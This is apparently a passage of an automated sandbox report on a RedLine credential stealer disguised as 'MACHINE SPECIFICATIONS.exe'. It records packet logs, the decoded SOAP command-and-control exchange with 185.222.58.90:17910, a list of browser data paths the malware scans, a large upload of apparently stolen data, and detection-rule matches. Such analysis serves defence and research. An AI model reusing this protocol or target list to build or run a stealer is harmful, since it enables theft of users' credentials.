May 25, 2022 15:08:10.094213963 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.094347954 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.095715046 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095748901 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095777988 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095803022 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095839977 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.095854998 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.095869064 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.096021891 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096049070 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096076012 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096105099 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096359968 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.096391916 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.097748041 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.116472006 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.116679907 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.116858959 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.117141008 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.118310928 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.118526936 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.118762016 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.141443014 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.141499043 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.141531944 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.141674995 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.141742945 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.141980886 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.142074108 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.142146111 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.142240047 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.142314911 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.142388105 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164194107 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164242983 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164346933 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164515018 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164591074 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164668083 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.164757013 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.164830923 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165020943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165307045 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165335894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165361881 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165395975 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165422916 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.165437937 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.186963081 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.187010050 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.187267065 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.187690020 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480609894 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480658054 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480684996 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480710983 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480736017 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480762005 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480789900 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480814934 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480840921 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.480866909 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.507190943 CEST	17910	49768	185.222.58.90	192.168.2.4
May 25, 2022 15:08:10.550302029 CEST	49768	17910	192.168.2.4	185.222.58.90
May 25, 2022 15:08:10.699542046 CEST	49768	17910	192.168.2.4	185.222.58.90

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2022 15:07:52.603076935 CEST	56076	53	192.168.2.4	8.8.8.8
May 25, 2022 15:07:52.643912077 CEST	60758	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 25, 2022 15:07:52.603076935 CEST	192.168.2.4	8.8.8.8	0x76f	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
May 25, 2022 15:07:52.643912077 CEST	192.168.2.4	8.8.8.8	0x587c	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 25, 2022 15:07:52.626219034 CEST	8.8.8.8	192.168.2.4	0x76f	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
May 25, 2022 15:07:52.667210102 CEST	8.8.8.8	192.168.2.4	0x587c	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

185.222.58.90:17910

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49758	185.222.58.90	17910	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 15:07:41.897141933 CEST	1159	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.90:17910 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
May 25, 2022 15:07:42.922243118 CEST	1206	IN	HTTP/1.1 100 Continue
May 25, 2022 15:07:42.973870993 CEST	1206	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:07:42 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
May 25, 2022 15:07:50.312830925 CEST	1207	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.90:17910 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
May 25, 2022 15:07:50.423234940 CEST	1207	IN	HTTP/1.1 100 Continue
May 25, 2022 15:07:52.078752041 CEST	1208	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:07:51 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49768	185.222.58.90	17910	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 15:08:06.501405954 CEST	1228	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.90:17910 Content-Length: 1134207 Expect: 100-continue Accept-Encoding: gzip, deflate
May 25, 2022 15:08:06.548837900 CEST	1228	IN	HTTP/1.1 100 Continue
May 25, 2022 15:08:09.656524897 CEST	2365	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:08:09 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
May 25, 2022 15:08:09.660119057 CEST	2365	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.90:17910 Content-Length: 1134199 Expect: 100-continue Accept-Encoding: gzip, deflate
May 25, 2022 15:08:09.769032001 CEST	2365	IN	HTTP/1.1 100 Continue
May 25, 2022 15:08:10.507190943 CEST	3520	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 25 May 2022 11:08:09 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	15:07:12
Start date:	25/05/2022
Path:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
Imagebase:	0x100000
File size:	984576 bytes
MD5 hash:	1AC0E9EEE0868534CFCA46127F5D5753
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	3
Start time:	15:07:19
Start date:	25/05/2022
Path:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Imagebase:	0x100000
File size:	984576 bytes
MD5 hash:	1AC0E9EEE0868534CFCA46127F5D5753
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	5
Start time:	15:07:22
Start date:	25/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff647620000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1134207Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1134199Expect: 100-continueAccept-Encoding: gzip, deflate

Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j

Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:1
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:17910
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:17910/
